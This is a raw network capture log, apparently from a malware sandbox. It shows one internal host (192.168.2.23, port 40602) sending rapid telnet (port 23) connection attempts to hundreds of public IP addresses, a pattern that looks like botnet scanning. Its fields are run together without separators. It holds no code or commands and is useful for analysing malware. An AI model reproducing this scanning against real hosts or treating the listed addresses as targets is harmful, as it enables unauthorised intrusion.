                                                          Dec 3, 2024 23:16:45.384532928 CET4060223192.168.2.23203.97.157.134
                                                          Dec 3, 2024 23:16:45.384537935 CET4060223192.168.2.23115.214.33.197
                                                          Dec 3, 2024 23:16:45.384538889 CET4060223192.168.2.2332.14.25.100
                                                          Dec 3, 2024 23:16:45.384556055 CET4060223192.168.2.23185.71.85.214
                                                          Dec 3, 2024 23:16:45.384556055 CET4060223192.168.2.23139.153.60.41
                                                          Dec 3, 2024 23:16:45.384567976 CET4060223192.168.2.2327.84.10.92
                                                          Dec 3, 2024 23:16:45.384568930 CET4060223192.168.2.23140.76.10.211
                                                          Dec 3, 2024 23:16:45.384568930 CET4060223192.168.2.23185.231.81.163
                                                          Dec 3, 2024 23:16:45.384573936 CET4060223192.168.2.23105.187.135.120
                                                          Dec 3, 2024 23:16:45.384579897 CET4060223192.168.2.23135.43.117.122
                                                          Dec 3, 2024 23:16:45.384579897 CET4060223192.168.2.23221.198.169.88
                                                          Dec 3, 2024 23:16:45.384583950 CET4060223192.168.2.2342.51.5.44
                                                          Dec 3, 2024 23:16:45.384588003 CET4060223192.168.2.231.139.194.233
                                                          Dec 3, 2024 23:16:45.384588003 CET4060223192.168.2.23217.31.44.89
                                                          Dec 3, 2024 23:16:45.384607077 CET4060223192.168.2.239.231.222.167
                                                          Dec 3, 2024 23:16:45.384608030 CET4060223192.168.2.23196.250.179.4
                                                          Dec 3, 2024 23:16:45.384610891 CET4060223192.168.2.2354.163.87.119
                                                          Dec 3, 2024 23:16:45.384617090 CET4060223192.168.2.2385.112.26.149
                                                          Dec 3, 2024 23:16:45.384618044 CET4060223192.168.2.23174.240.221.105
                                                          Dec 3, 2024 23:16:45.384624004 CET4060223192.168.2.23213.83.187.7
                                                          Dec 3, 2024 23:16:45.384635925 CET4060223192.168.2.23125.169.157.239
                                                          Dec 3, 2024 23:16:45.384639025 CET4060223192.168.2.23166.127.178.91
                                                          Dec 3, 2024 23:16:45.384653091 CET4060223192.168.2.2331.226.180.43
                                                          Dec 3, 2024 23:16:45.384656906 CET4060223192.168.2.23108.129.32.48
                                                          Dec 3, 2024 23:16:45.384659052 CET4060223192.168.2.23104.133.85.82
                                                          Dec 3, 2024 23:16:45.384668112 CET4060223192.168.2.2394.13.146.101
                                                          Dec 3, 2024 23:16:45.384669065 CET4060223192.168.2.23177.243.65.175
                                                          Dec 3, 2024 23:16:45.384687901 CET4060223192.168.2.23159.104.189.124
                                                          Dec 3, 2024 23:16:45.384689093 CET4060223192.168.2.23179.144.70.238
                                                          Dec 3, 2024 23:16:45.384689093 CET4060223192.168.2.2391.181.197.210
                                                          Dec 3, 2024 23:16:45.384687901 CET4060223192.168.2.23185.199.132.10
                                                          Dec 3, 2024 23:16:45.384689093 CET4060223192.168.2.23115.29.30.151
                                                          Dec 3, 2024 23:16:45.384691954 CET4060223192.168.2.23183.22.60.191
                                                          Dec 3, 2024 23:16:45.384695053 CET4060223192.168.2.23113.90.24.31
                                                          Dec 3, 2024 23:16:45.384712934 CET4060223192.168.2.2313.158.36.195
                                                          Dec 3, 2024 23:16:45.384715080 CET4060223192.168.2.2375.90.192.45
                                                          Dec 3, 2024 23:16:45.384717941 CET4060223192.168.2.2352.114.98.174
                                                          Dec 3, 2024 23:16:45.384731054 CET4060223192.168.2.23100.158.61.157
                                                          Dec 3, 2024 23:16:45.384732962 CET4060223192.168.2.2364.191.196.90
                                                          Dec 3, 2024 23:16:45.384736061 CET4060223192.168.2.235.187.207.151
                                                          Dec 3, 2024 23:16:45.384748936 CET4060223192.168.2.23216.29.103.102
                                                          Dec 3, 2024 23:16:45.384758949 CET4060223192.168.2.23134.47.149.136
                                                          Dec 3, 2024 23:16:45.384758949 CET4060223192.168.2.23154.150.21.79
                                                          Dec 3, 2024 23:16:45.384763956 CET4060223192.168.2.23149.79.104.78
                                                          Dec 3, 2024 23:16:45.384772062 CET4060223192.168.2.23153.21.53.193
                                                          Dec 3, 2024 23:16:45.384779930 CET4060223192.168.2.23130.253.110.86
                                                          Dec 3, 2024 23:16:45.384780884 CET4060223192.168.2.23216.1.64.199
                                                          Dec 3, 2024 23:16:45.384785891 CET4060223192.168.2.23166.252.72.87
                                                          Dec 3, 2024 23:16:45.384788036 CET4060223192.168.2.23164.39.21.94
                                                          Dec 3, 2024 23:16:45.384788990 CET4060223192.168.2.238.17.203.253
                                                          Dec 3, 2024 23:16:45.384788990 CET4060223192.168.2.23204.201.126.199
                                                          Dec 3, 2024 23:16:45.384797096 CET4060223192.168.2.23103.10.66.49
                                                          Dec 3, 2024 23:16:45.384804964 CET4060223192.168.2.2345.188.88.164
                                                          Dec 3, 2024 23:16:45.384813070 CET4060223192.168.2.2341.132.175.153
                                                          Dec 3, 2024 23:16:45.384815931 CET4060223192.168.2.23163.197.80.151
                                                          Dec 3, 2024 23:16:45.384829998 CET4060223192.168.2.2374.91.98.55
                                                          Dec 3, 2024 23:16:45.384833097 CET4060223192.168.2.2332.63.129.149
                                                          Dec 3, 2024 23:16:45.384838104 CET4060223192.168.2.23173.250.144.42
                                                          Dec 3, 2024 23:16:45.384846926 CET4060223192.168.2.235.194.39.59
                                                          Dec 3, 2024 23:16:45.384857893 CET4060223192.168.2.23143.149.100.11
                                                          Dec 3, 2024 23:16:45.384865999 CET4060223192.168.2.234.136.93.45
                                                          Dec 3, 2024 23:16:45.384871960 CET4060223192.168.2.2312.15.9.236
                                                          Dec 3, 2024 23:16:45.384872913 CET4060223192.168.2.23113.56.111.127
                                                          Dec 3, 2024 23:16:45.384886980 CET4060223192.168.2.23151.19.122.65
                                                          Dec 3, 2024 23:16:45.384888887 CET4060223192.168.2.23178.93.157.77
                                                          Dec 3, 2024 23:16:45.384890079 CET4060223192.168.2.2345.39.43.23
                                                          Dec 3, 2024 23:16:45.384892941 CET4060223192.168.2.23126.235.176.176
                                                          Dec 3, 2024 23:16:45.384908915 CET4060223192.168.2.2344.198.38.170
                                                          Dec 3, 2024 23:16:45.384911060 CET4060223192.168.2.23216.147.50.129
                                                          Dec 3, 2024 23:16:45.384911060 CET4060223192.168.2.2318.239.205.45
                                                          Dec 3, 2024 23:16:45.384921074 CET4060223192.168.2.2360.56.244.253
                                                          Dec 3, 2024 23:16:45.384921074 CET4060223192.168.2.23157.142.125.9
                                                          Dec 3, 2024 23:16:45.384921074 CET4060223192.168.2.2389.41.131.60
                                                          Dec 3, 2024 23:16:45.384921074 CET4060223192.168.2.23103.77.142.245
                                                          Dec 3, 2024 23:16:45.384921074 CET4060223192.168.2.23190.214.175.77
                                                          Dec 3, 2024 23:16:45.384922981 CET4060223192.168.2.23173.122.210.26
                                                          Dec 3, 2024 23:16:45.384922981 CET4060223192.168.2.23104.76.10.199
                                                          Dec 3, 2024 23:16:45.384927034 CET4060223192.168.2.2369.40.3.181
                                                          Dec 3, 2024 23:16:45.384929895 CET4060223192.168.2.23216.208.199.150
                                                          Dec 3, 2024 23:16:45.384932995 CET4060223192.168.2.23126.18.246.5
                                                          Dec 3, 2024 23:16:45.384937048 CET4060223192.168.2.2361.3.12.0
                                                          Dec 3, 2024 23:16:45.384941101 CET4060223192.168.2.23165.157.50.87
                                                          Dec 3, 2024 23:16:45.384957075 CET4060223192.168.2.2389.18.239.102
                                                          Dec 3, 2024 23:16:45.384960890 CET4060223192.168.2.2394.212.4.226
                                                          Dec 3, 2024 23:16:45.384960890 CET4060223192.168.2.23116.50.159.211
                                                          Dec 3, 2024 23:16:45.384960890 CET4060223192.168.2.2373.63.45.208
                                                          Dec 3, 2024 23:16:45.384960890 CET4060223192.168.2.239.184.96.240
                                                          Dec 3, 2024 23:16:45.384968042 CET4060223192.168.2.23164.66.42.3
                                                          Dec 3, 2024 23:16:45.384984016 CET4060223192.168.2.2397.236.129.92
                                                          Dec 3, 2024 23:16:45.384984970 CET4060223192.168.2.2345.131.33.142
                                                          Dec 3, 2024 23:16:45.384989023 CET4060223192.168.2.23190.45.152.144
                                                          Dec 3, 2024 23:16:45.384998083 CET4060223192.168.2.238.73.67.173
                                                          Dec 3, 2024 23:16:45.385000944 CET4060223192.168.2.23189.191.192.118
                                                          Dec 3, 2024 23:16:45.385009050 CET4060223192.168.2.23119.115.171.6
                                                          Dec 3, 2024 23:16:45.385011911 CET4060223192.168.2.2366.34.47.82
                                                          Dec 3, 2024 23:16:45.385026932 CET4060223192.168.2.2341.50.101.5
                                                          Dec 3, 2024 23:16:45.385026932 CET4060223192.168.2.23212.81.93.5
                                                          Dec 3, 2024 23:16:45.385032892 CET4060223192.168.2.23177.162.135.55
                                                          Dec 3, 2024 23:16:45.385035038 CET4060223192.168.2.2386.45.95.172
                                                          Dec 3, 2024 23:16:45.385046005 CET4060223192.168.2.2348.202.102.74
                                                          Dec 3, 2024 23:16:45.385046005 CET4060223192.168.2.23123.205.6.68
                                                          Dec 3, 2024 23:16:45.385062933 CET4060223192.168.2.2349.62.187.133
                                                          Dec 3, 2024 23:16:45.385065079 CET4060223192.168.2.23109.241.210.213
                                                          Dec 3, 2024 23:16:45.385065079 CET4060223192.168.2.23207.71.176.133
                                                          Dec 3, 2024 23:16:45.385065079 CET4060223192.168.2.2335.108.12.187
                                                          Dec 3, 2024 23:16:45.385071993 CET4060223192.168.2.2369.3.95.79
                                                          Dec 3, 2024 23:16:45.385072947 CET4060223192.168.2.23201.158.128.122
                                                          Dec 3, 2024 23:16:45.385072947 CET4060223192.168.2.2376.18.167.15
                                                          Dec 3, 2024 23:16:45.385075092 CET4060223192.168.2.2346.89.106.232
                                                          Dec 3, 2024 23:16:45.385076046 CET4060223192.168.2.234.202.103.10
                                                          Dec 3, 2024 23:16:45.385086060 CET4060223192.168.2.23222.96.233.51
                                                          Dec 3, 2024 23:16:45.385093927 CET4060223192.168.2.23130.230.171.8
                                                          Dec 3, 2024 23:16:45.385101080 CET4060223192.168.2.23158.66.106.34
                                                          Dec 3, 2024 23:16:45.385107994 CET4060223192.168.2.23130.141.191.196
                                                          Dec 3, 2024 23:16:45.385119915 CET4060223192.168.2.2381.79.65.43
                                                          Dec 3, 2024 23:16:45.385127068 CET4060223192.168.2.23143.20.120.208
                                                          Dec 3, 2024 23:16:45.385129929 CET4060223192.168.2.23109.211.208.161
                                                          Dec 3, 2024 23:16:45.385129929 CET4060223192.168.2.231.136.128.120
                                                          Dec 3, 2024 23:16:45.385137081 CET4060223192.168.2.23166.3.227.11
                                                          Dec 3, 2024 23:16:45.385149002 CET4060223192.168.2.23129.106.178.253
                                                          Dec 3, 2024 23:16:45.385149002 CET4060223192.168.2.23147.28.147.35
                                                          Dec 3, 2024 23:16:45.385153055 CET4060223192.168.2.23102.107.52.189
                                                          Dec 3, 2024 23:16:45.385153055 CET4060223192.168.2.2317.151.193.94
                                                          Dec 3, 2024 23:16:45.385168076 CET4060223192.168.2.23181.140.61.39
                                                          Dec 3, 2024 23:16:45.385169983 CET4060223192.168.2.2360.118.37.177
                                                          Dec 3, 2024 23:16:45.385169983 CET4060223192.168.2.23143.19.73.63
                                                          Dec 3, 2024 23:16:45.385169983 CET4060223192.168.2.23140.124.251.20
                                                          Dec 3, 2024 23:16:45.385174990 CET4060223192.168.2.23196.138.234.54
                                                          Dec 3, 2024 23:16:45.385174990 CET4060223192.168.2.2369.181.2.255
                                                          Dec 3, 2024 23:16:45.385178089 CET4060223192.168.2.23204.14.143.216
                                                          Dec 3, 2024 23:16:45.385179996 CET4060223192.168.2.2377.190.1.121
                                                          Dec 3, 2024 23:16:45.385185003 CET4060223192.168.2.2379.226.173.40
                                                          Dec 3, 2024 23:16:45.385189056 CET4060223192.168.2.23146.93.229.100
                                                          Dec 3, 2024 23:16:45.385193110 CET4060223192.168.2.2382.167.232.41
                                                          Dec 3, 2024 23:16:45.385195017 CET4060223192.168.2.23107.130.191.35
                                                          Dec 3, 2024 23:16:45.385195971 CET4060223192.168.2.239.18.232.186
                                                          Dec 3, 2024 23:16:45.385195971 CET4060223192.168.2.2341.115.251.120
                                                          Dec 3, 2024 23:16:45.385195971 CET4060223192.168.2.23178.225.253.208
                                                          Dec 3, 2024 23:16:45.385195971 CET4060223192.168.2.23203.217.200.159
                                                          Dec 3, 2024 23:16:45.385198116 CET4060223192.168.2.23109.9.67.224
                                                          Dec 3, 2024 23:16:45.385198116 CET4060223192.168.2.2352.175.200.253
                                                          Dec 3, 2024 23:16:45.385200977 CET4060223192.168.2.2335.136.117.185
                                                          Dec 3, 2024 23:16:45.385201931 CET4060223192.168.2.23147.11.208.217
                                                          Dec 3, 2024 23:16:45.385226011 CET4060223192.168.2.23157.27.13.72
                                                          Dec 3, 2024 23:16:45.385238886 CET4060223192.168.2.2366.250.49.30
                                                          Dec 3, 2024 23:16:45.385240078 CET4060223192.168.2.2375.189.210.187
                                                          Dec 3, 2024 23:16:45.385241032 CET4060223192.168.2.2377.195.146.226
                                                          Dec 3, 2024 23:16:45.385241985 CET4060223192.168.2.23116.105.229.119
                                                          Dec 3, 2024 23:16:45.385240078 CET4060223192.168.2.23168.58.131.230
                                                          Dec 3, 2024 23:16:45.385240078 CET4060223192.168.2.23120.4.42.240
                                                          Dec 3, 2024 23:16:45.385240078 CET4060223192.168.2.2349.218.41.171
                                                          Dec 3, 2024 23:16:45.385258913 CET4060223192.168.2.23123.140.184.201
                                                          Dec 3, 2024 23:16:45.385260105 CET4060223192.168.2.23208.248.187.190
                                                          Dec 3, 2024 23:16:45.385261059 CET4060223192.168.2.23196.236.161.44
                                                          Dec 3, 2024 23:16:45.385261059 CET4060223192.168.2.2320.152.248.150
                                                          Dec 3, 2024 23:16:45.385262012 CET4060223192.168.2.23108.141.16.165
                                                          Dec 3, 2024 23:16:45.385262012 CET4060223192.168.2.23192.143.73.102
                                                          Dec 3, 2024 23:16:45.385263920 CET4060223192.168.2.23185.30.140.14
                                                          Dec 3, 2024 23:16:45.385263920 CET4060223192.168.2.23201.75.230.121
                                                          Dec 3, 2024 23:16:45.385278940 CET4060223192.168.2.23103.102.178.157
                                                          Dec 3, 2024 23:16:45.385279894 CET4060223192.168.2.23158.61.181.152
                                                          Dec 3, 2024 23:16:45.385279894 CET4060223192.168.2.23122.27.112.98
                                                          Dec 3, 2024 23:16:45.385279894 CET4060223192.168.2.2396.42.195.124
                                                          Dec 3, 2024 23:16:45.385281086 CET4060223192.168.2.23153.91.62.202
                                                          Dec 3, 2024 23:16:45.385282993 CET4060223192.168.2.23205.60.103.215
                                                          Dec 3, 2024 23:16:45.385282993 CET4060223192.168.2.23120.64.231.151
                                                          Dec 3, 2024 23:16:45.385282993 CET4060223192.168.2.23137.75.145.249
                                                          Dec 3, 2024 23:16:45.385284901 CET4060223192.168.2.2338.22.150.25
                                                          Dec 3, 2024 23:16:45.385284901 CET4060223192.168.2.23154.87.60.115
                                                          Dec 3, 2024 23:16:45.385284901 CET4060223192.168.2.23142.213.70.165
                                                          Dec 3, 2024 23:16:45.385284901 CET4060223192.168.2.23132.52.52.242
                                                          Dec 3, 2024 23:16:45.385284901 CET4060223192.168.2.23188.233.81.210
                                                          Dec 3, 2024 23:16:45.385293961 CET4060223192.168.2.23199.7.166.224
                                                          Dec 3, 2024 23:16:45.385293961 CET4060223192.168.2.23201.159.23.242
                                                          Dec 3, 2024 23:16:45.385293961 CET4060223192.168.2.23167.204.6.217
                                                          Dec 3, 2024 23:16:45.385296106 CET4060223192.168.2.2398.229.236.24
                                                          Dec 3, 2024 23:16:45.385297060 CET4060223192.168.2.23120.169.58.142
                                                          Dec 3, 2024 23:16:45.385299921 CET4060223192.168.2.23164.221.99.31
                                                          Dec 3, 2024 23:16:45.385315895 CET4060223192.168.2.23136.3.106.125
                                                          Dec 3, 2024 23:16:45.385317087 CET4060223192.168.2.23191.138.104.190
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.23183.169.52.189
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.23146.35.44.181
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.234.46.66.221
                                                          Dec 3, 2024 23:16:45.385318995 CET4060223192.168.2.23184.17.156.29
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.23170.9.216.212
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.23110.153.99.64
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.2338.9.77.55
                                                          Dec 3, 2024 23:16:45.385318041 CET4060223192.168.2.2353.141.195.32
                                                          Dec 3, 2024 23:16:45.385319948 CET4060223192.168.2.2387.107.135.181
                                                          Dec 3, 2024 23:16:45.385335922 CET4060223192.168.2.23159.122.27.186
                                                          Dec 3, 2024 23:16:45.385340929 CET4060223192.168.2.2367.11.217.93
                                                          Dec 3, 2024 23:16:45.385340929 CET4060223192.168.2.23169.126.108.36
                                                          Dec 3, 2024 23:16:45.385341883 CET4060223192.168.2.2374.208.72.78
                                                          Dec 3, 2024 23:16:45.385340929 CET4060223192.168.2.23203.243.217.199
                                                          Dec 3, 2024 23:16:45.385341883 CET4060223192.168.2.23176.211.162.42
                                                          Dec 3, 2024 23:16:45.385340929 CET4060223192.168.2.23193.202.221.121
                                                          Dec 3, 2024 23:16:45.385343075 CET4060223192.168.2.232.216.229.249
                                                          Dec 3, 2024 23:16:45.385343075 CET4060223192.168.2.23120.123.36.230
                                                          Dec 3, 2024 23:16:45.385340929 CET4060223192.168.2.23204.173.28.172
                                                          Dec 3, 2024 23:16:45.385341883 CET4060223192.168.2.23137.239.169.1
                                                          Dec 3, 2024 23:16:45.385343075 CET4060223192.168.2.2386.58.173.94
                                                          Dec 3, 2024 23:16:45.385356903 CET4060223192.168.2.23106.229.236.96
                                                          Dec 3, 2024 23:16:45.385359049 CET4060223192.168.2.23151.66.71.18
                                                          Dec 3, 2024 23:16:45.385359049 CET4060223192.168.2.2331.48.249.162
                                                          Dec 3, 2024 23:16:45.385360003 CET4060223192.168.2.2394.5.219.132
                                                          Dec 3, 2024 23:16:45.385360956 CET4060223192.168.2.2381.255.190.135
                                                          Dec 3, 2024 23:16:45.385364056 CET4060223192.168.2.2312.151.7.157
                                                          Dec 3, 2024 23:16:45.385364056 CET4060223192.168.2.23199.235.199.38
                                                          Dec 3, 2024 23:16:45.385365009 CET4060223192.168.2.23156.62.141.244
                                                          Dec 3, 2024 23:16:45.385365963 CET4060223192.168.2.23213.240.53.19
                                                          Dec 3, 2024 23:16:45.385380030 CET4060223192.168.2.2342.242.239.17
                                                          Dec 3, 2024 23:16:45.385380030 CET4060223192.168.2.23120.73.10.124
                                                          Dec 3, 2024 23:16:45.385380983 CET4060223192.168.2.23101.10.43.116
                                                          Dec 3, 2024 23:16:45.385380983 CET4060223192.168.2.2313.253.66.51
                                                          Dec 3, 2024 23:16:45.385382891 CET4060223192.168.2.2371.196.85.72
                                                          Dec 3, 2024 23:16:45.385382891 CET4060223192.168.2.2372.60.4.215
                                                          Dec 3, 2024 23:16:45.385382891 CET4060223192.168.2.23130.46.76.238
                                                          Dec 3, 2024 23:16:45.385384083 CET4060223192.168.2.23145.68.96.224
                                                          Dec 3, 2024 23:16:45.385382891 CET4060223192.168.2.23111.31.110.149
                                                          Dec 3, 2024 23:16:45.385384083 CET4060223192.168.2.23206.92.73.145
                                                          Dec 3, 2024 23:16:45.385382891 CET4060223192.168.2.23102.124.43.42
                                                          Dec 3, 2024 23:16:45.385384083 CET4060223192.168.2.2312.106.99.12
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.23167.92.51.3
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.2340.118.167.251
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.23106.228.8.237
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.23128.85.150.95
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.23205.180.52.252
                                                          Dec 3, 2024 23:16:45.385385990 CET4060223192.168.2.238.208.189.175
                                                          Dec 3, 2024 23:16:45.385394096 CET4060223192.168.2.2342.193.175.212
                                                          Dec 3, 2024 23:16:45.385396957 CET4060223192.168.2.23163.220.111.160
                                                          Dec 3, 2024 23:16:45.385400057 CET4060223192.168.2.23211.2.87.101
                                                          Dec 3, 2024 23:16:45.385413885 CET4060223192.168.2.2337.136.228.212
                                                          Dec 3, 2024 23:16:45.385413885 CET4060223192.168.2.23104.57.42.18
                                                          Dec 3, 2024 23:16:45.385413885 CET4060223192.168.2.2376.13.172.248
                                                          Dec 3, 2024 23:16:45.385413885 CET4060223192.168.2.2334.46.218.163
                                                          Dec 3, 2024 23:16:45.385415077 CET4060223192.168.2.2342.43.174.119
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.2314.230.10.112
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.23109.61.87.26
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.239.198.238.43
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.23213.149.33.196
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.23183.43.232.55
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.2382.93.119.11
                                                          Dec 3, 2024 23:16:45.385417938 CET4060223192.168.2.23128.84.80.63
                                                          Dec 3, 2024 23:16:45.385421991 CET4060223192.168.2.2319.3.102.7
                                                          Dec 3, 2024 23:16:45.385421991 CET4060223192.168.2.23163.207.243.222
                                                          Dec 3, 2024 23:16:45.385426044 CET4060223192.168.2.2394.223.75.136
                                                          Dec 3, 2024 23:16:45.385426044 CET4060223192.168.2.2324.35.241.112
                                                          Dec 3, 2024 23:16:45.385426044 CET4060223192.168.2.23221.237.28.50
                                                          Dec 3, 2024 23:16:45.385427952 CET4060223192.168.2.23219.8.196.252
                                                          Dec 3, 2024 23:16:45.385435104 CET4060223192.168.2.23162.135.251.15
                                                          Dec 3, 2024 23:16:45.385435104 CET4060223192.168.2.234.249.75.199
                                                          Dec 3, 2024 23:16:45.385436058 CET4060223192.168.2.23139.25.159.52
                                                          Dec 3, 2024 23:16:45.385437965 CET4060223192.168.2.23216.101.236.84
                                                          Dec 3, 2024 23:16:45.385440111 CET4060223192.168.2.2313.175.222.14
                                                          Dec 3, 2024 23:16:45.385440111 CET4060223192.168.2.23147.71.222.119
                                                          Dec 3, 2024 23:16:45.385442972 CET4060223192.168.2.2339.194.139.224
                                                          Dec 3, 2024 23:16:45.385447979 CET4060223192.168.2.23108.191.198.30
                                                          Dec 3, 2024 23:16:45.385451078 CET4060223192.168.2.23106.238.146.162
                                                          Dec 3, 2024 23:16:45.385462046 CET4060223192.168.2.23152.69.69.4
                                                          Dec 3, 2024 23:16:45.385462999 CET4060223192.168.2.23168.171.195.147
                                                          Dec 3, 2024 23:16:45.385463953 CET4060223192.168.2.23212.67.220.14
                                                          Dec 3, 2024 23:16:45.385481119 CET4060223192.168.2.23202.65.98.152
                                                          Dec 3, 2024 23:16:45.385483027 CET4060223192.168.2.23126.116.48.5
                                                          Dec 3, 2024 23:16:45.385485888 CET4060223192.168.2.234.215.145.8
                                                          Dec 3, 2024 23:16:45.385497093 CET4060223192.168.2.23117.42.16.38
                                                          Dec 3, 2024 23:16:45.385502100 CET4060223192.168.2.23113.86.147.242
                                                          Dec 3, 2024 23:16:45.385502100 CET4060223192.168.2.23103.83.64.41
                                                          Dec 3, 2024 23:16:45.385514021 CET4060223192.168.2.23176.75.106.30
                                                          Dec 3, 2024 23:16:45.385516882 CET4060223192.168.2.2325.243.142.159
                                                          Dec 3, 2024 23:16:45.385534048 CET4060223192.168.2.2370.238.0.30
                                                          Dec 3, 2024 23:16:45.385534048 CET4060223192.168.2.23103.175.247.141
                                                          Dec 3, 2024 23:16:45.385535002 CET4060223192.168.2.2323.244.150.2
                                                          Dec 3, 2024 23:16:45.385539055 CET4060223192.168.2.23169.156.106.176
                                                          Dec 3, 2024 23:16:45.385539055 CET4060223192.168.2.2367.21.143.148
                                                          Dec 3, 2024 23:16:45.385539055 CET4060223192.168.2.23116.1.221.211
                                                          Dec 3, 2024 23:16:45.385545015 CET4060223192.168.2.2390.201.231.130
                                                          Dec 3, 2024 23:16:45.385545969 CET4060223192.168.2.2312.149.198.32
                                                          Dec 3, 2024 23:16:45.385550022 CET4060223192.168.2.2351.179.250.17
                                                          Dec 3, 2024 23:16:45.385566950 CET4060223192.168.2.2348.81.161.90
                                                          Dec 3, 2024 23:16:45.385569096 CET4060223192.168.2.23197.124.30.43
                                                          Dec 3, 2024 23:16:45.385569096 CET4060223192.168.2.232.18.137.47
                                                          Dec 3, 2024 23:16:45.385569096 CET4060223192.168.2.23151.188.66.106
                                                          Dec 3, 2024 23:16:45.385581970 CET4060223192.168.2.2358.170.88.150
                                                          Dec 3, 2024 23:16:45.385586023 CET4060223192.168.2.2359.56.236.40
                                                          Dec 3, 2024 23:16:45.385591030 CET4060223192.168.2.2363.106.253.207
                                                          Dec 3, 2024 23:16:45.385591030 CET4060223192.168.2.23221.56.36.10
                                                          Dec 3, 2024 23:16:45.385597944 CET4060223192.168.2.2396.196.184.169
                                                          Dec 3, 2024 23:16:45.385611057 CET4060223192.168.2.2395.82.48.48
                                                          Dec 3, 2024 23:16:45.385611057 CET4060223192.168.2.2362.51.78.130
                                                          Dec 3, 2024 23:16:45.385611057 CET4060223192.168.2.2314.98.56.61
                                                          Dec 3, 2024 23:16:45.385618925 CET4060223192.168.2.23145.62.45.60
                                                          Dec 3, 2024 23:16:45.385626078 CET4060223192.168.2.23109.245.27.107
                                                          Dec 3, 2024 23:16:45.385631084 CET4060223192.168.2.23113.55.36.68
                                                          Dec 3, 2024 23:16:45.385634899 CET4060223192.168.2.23149.185.217.234
                                                          Dec 3, 2024 23:16:45.385638952 CET4060223192.168.2.2331.170.11.220
                                                          Dec 3, 2024 23:16:45.385646105 CET4060223192.168.2.2324.247.171.73
                                                          Dec 3, 2024 23:16:45.385649920 CET4060223192.168.2.23152.241.144.92
                                                          Dec 3, 2024 23:16:45.385649920 CET4060223192.168.2.23109.67.64.54
                                                          Dec 3, 2024 23:16:45.385663033 CET4060223192.168.2.2364.253.239.192
                                                          Dec 3, 2024 23:16:45.385668993 CET4060223192.168.2.23108.25.213.189
                                                          Dec 3, 2024 23:16:45.385672092 CET4060223192.168.2.2369.3.0.16
                                                          Dec 3, 2024 23:16:45.385675907 CET4060223192.168.2.23199.169.19.124
                                                          Dec 3, 2024 23:16:45.385677099 CET4060223192.168.2.23122.247.83.242
                                                          Dec 3, 2024 23:16:45.385677099 CET4060223192.168.2.2338.218.143.213
                                                          Dec 3, 2024 23:16:45.385684013 CET4060223192.168.2.23113.0.248.30
                                                          Dec 3, 2024 23:16:45.385698080 CET4060223192.168.2.23192.81.166.120
                                                          Dec 3, 2024 23:16:45.385698080 CET4060223192.168.2.23190.47.86.70
                                                          Dec 3, 2024 23:16:45.385699034 CET4060223192.168.2.2324.22.22.65
                                                          Dec 3, 2024 23:16:45.385705948 CET4060223192.168.2.23169.146.134.179
                                                          Dec 3, 2024 23:16:45.385720968 CET4060223192.168.2.2395.183.164.160
                                                          Dec 3, 2024 23:16:45.385724068 CET4060223192.168.2.23186.229.125.234
                                                          Dec 3, 2024 23:16:45.385724068 CET4060223192.168.2.239.1.15.145
                                                          Dec 3, 2024 23:16:45.385727882 CET4060223192.168.2.23113.136.214.176
                                                          Dec 3, 2024 23:16:45.385727882 CET4060223192.168.2.23143.94.219.137
                                                          Dec 3, 2024 23:16:45.385729074 CET4060223192.168.2.23182.87.27.189
                                                          Dec 3, 2024 23:16:45.385734081 CET4060223192.168.2.2346.97.50.115
                                                          Dec 3, 2024 23:16:45.385737896 CET4060223192.168.2.2343.76.141.27
                                                          Dec 3, 2024 23:16:45.385740995 CET4060223192.168.2.2396.44.66.71
                                                          Dec 3, 2024 23:16:45.385751963 CET4060223192.168.2.231.160.209.187
                                                          Dec 3, 2024 23:16:45.385761023 CET4060223192.168.2.23152.17.112.94
                                                          Dec 3, 2024 23:16:45.385761976 CET4060223192.168.2.23195.131.60.139
                                                          Dec 3, 2024 23:16:45.385761976 CET4060223192.168.2.23169.112.42.42
                                                          Dec 3, 2024 23:16:45.385761976 CET4060223192.168.2.23112.43.197.33
                                                          Dec 3, 2024 23:16:45.385761976 CET4060223192.168.2.2365.41.18.248
                                                          Dec 3, 2024 23:16:45.385768890 CET4060223192.168.2.23112.75.126.43
                                                          Dec 3, 2024 23:16:45.385772943 CET4060223192.168.2.23195.212.96.79
                                                          Dec 3, 2024 23:16:45.385775089 CET4060223192.168.2.23219.66.203.209
                                                          Dec 3, 2024 23:16:45.385777950 CET4060223192.168.2.2317.75.43.222
                                                          Dec 3, 2024 23:16:45.385777950 CET4060223192.168.2.2354.50.60.215
                                                          Dec 3, 2024 23:16:45.385778904 CET4060223192.168.2.2363.42.181.60
                                                          Dec 3, 2024 23:16:45.385780096 CET4060223192.168.2.23115.58.93.239
                                                          Dec 3, 2024 23:16:45.385780096 CET4060223192.168.2.2382.57.181.5
                                                          Dec 3, 2024 23:16:45.385782957 CET4060223192.168.2.2351.198.213.22
                                                          Dec 3, 2024 23:16:45.385790110 CET4060223192.168.2.23131.146.25.157
                                                          Dec 3, 2024 23:16:45.385791063 CET4060223192.168.2.23125.111.99.85
                                                          Dec 3, 2024 23:16:45.385797024 CET4060223192.168.2.23211.84.10.14
                                                          Dec 3, 2024 23:16:45.385798931 CET4060223192.168.2.2335.172.7.76
                                                          Dec 3, 2024 23:16:45.385798931 CET4060223192.168.2.2320.241.91.244
                                                          Dec 3, 2024 23:16:45.385802984 CET4060223192.168.2.23204.195.81.69
                                                          Dec 3, 2024 23:16:45.385804892 CET4060223192.168.2.2370.235.152.138
                                                          Dec 3, 2024 23:16:45.385809898 CET4060223192.168.2.23192.59.174.85
